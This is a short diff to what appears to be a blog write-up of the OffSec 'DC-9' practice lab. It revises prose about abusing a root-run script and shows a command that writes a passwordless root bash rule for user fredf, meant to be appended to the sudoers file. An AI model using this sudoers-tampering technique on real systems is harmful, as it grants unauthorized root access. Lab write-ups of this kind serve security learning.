l4rzy/l4rzy.github.io/_posts/2024-07-01-offsec-labs-play-dc-9.md

     f.close()
 ```

-So we know that we can basically run `cp` as root.
-There are many ways to get root, let's append the sudoers file.
+So we know that we can basically append to any file as root.
+There are many ways to get root, for example let's append the sudoers file.

 ```
 fredf@dc-9:/etc/sudoers.d$ echo "fredf   ALL=(root) NOPASSWD: /usr/bin/bash" > /tmp/conf